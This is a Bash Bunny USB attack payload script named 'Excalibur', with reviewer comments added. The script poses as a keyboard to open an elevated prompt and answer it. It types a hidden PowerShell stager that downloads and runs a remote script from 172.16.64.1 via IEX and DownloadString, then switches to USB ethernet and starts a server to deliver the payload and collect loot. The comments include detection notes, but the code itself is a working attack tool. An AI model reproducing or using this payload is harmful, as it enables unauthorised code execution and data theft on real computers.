#!/bin/bash
# .-.
# (0.0)
# '=.|m|.='
# .='/@\`=.
# @8@
# _ 8@8 _
# (@__/@8@\__@)
# `-=:8@8:=-'
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# \:/
# ^
#
# Title: Excalibur
# Author: Dviros, Dora
# Version: 1.0
#
# Excalibur is an APT based "Powershell" for the Bashbunny project.
# Its purpose is to show how a "simple" USB drive can carry out all seven stages of the cyber kill chain.
# Payload body. LED, ATTACKMODE, RUN and Q are not defined in this file; they
# are presumably helper commands supplied by the Bash Bunny framework.
# Flow visible below: create loot directories, act as a USB keyboard to open an
# elevated prompt and type a PowerShell stager, then switch to USB Ethernet and
# start server.py for the stager to contact.
LED SETUP
# Create the loot directories on the device's own storage.
LOOTDIR=/root/udisk/loot/Excalibur
# NOTE(review): $LOOTDIR is expanded unquoted; harmless for this fixed path.
# It is not referenced again in this script after the mkdir.
mkdir -p $LOOTDIR
# SWITCH_POSITION is not set in this file -- presumably exported by the
# framework. If it were empty the path would collapse to /root/udisk/payloads/.
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID stage: the device presents itself as a keyboard, so everything typed
# below lands in whatever session is in the foreground on the host.
ATTACKMODE HID
# Elevation. NOTE(review): the original label here was "UAC Bypass", but
# nothing below bypasses UAC -- Start-Process -Verb RunAs raises the normal
# elevation prompt and the keystrokes that follow appear to answer it. That
# presumably only works in an unlocked session of a local administrator with a
# consent-only prompt; a standard user (credential prompt) or a locked screen
# should stop it -- confirm.
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
# Fixed delays stand in for waiting on the prompt to appear. LEFTARROW + ENTER
# look like they move focus to and press the affirmative button -- TODO confirm.
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
# Types a PowerShell one-liner into the prompt opened above. As written it runs
# with a hidden window, loops until 172.16.64.1 answers Test-Connection, then
# fetches http://172.16.64.1/p_v2.ps1 with Net.WebClient, runs it via IEX and
# exits. p_v2.ps1 is not part of this listing; per the original comment it
# pulls further scripts and uploads results.
# Detection notes: the host sees a new USB keyboard followed by a new RNDIS
# network adapter, and a powershell.exe command line containing "-W Hidden",
# "IEX" and "DownloadString". Process command-line auditing and PowerShell
# script block logging should capture the stager and the script it fetches.
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p_v2.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet stage: re-enumerate as an RNDIS USB network adapter so the host can
# reach the device at the address the stager polls (172.16.64.1 -- presumably
# the device's address in this mode; it is not configured in this file).
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# Disabled in the original:
# mount -o sync /dev/nandf /root/udisk
# Append a rule dropping UDP packets to port 53 (DNS) that leave the device.
# NOTE(review): the reason is not stated, and the rule is never removed here.
iptables -A OUTPUT -p udp --dport 53 -j DROP
# Run server.py from the selected switch directory in the foreground; the lines
# below only run after it exits. server.py is not part of this listing --
# presumably the web server that serves p_v2.ps1 and receives the results.
# Uses whichever "python" is first on PATH; $SWITCHDIR is expanded unquoted.
python $SWITCHDIR/server.py
# NOTE(review): the original comment said "Wait for EOF in loot folder", but no
# such check exists -- the script only sets the LED and sleeps for 60 seconds.
LED SPECIAL2
sleep 60
# NOTE(review): this "done" has no matching for/while/until in the visible
# script, so bash reports a syntax error when it reaches it. Everything above
# has already run by then, so the effect is presumably just a non-zero exit.
done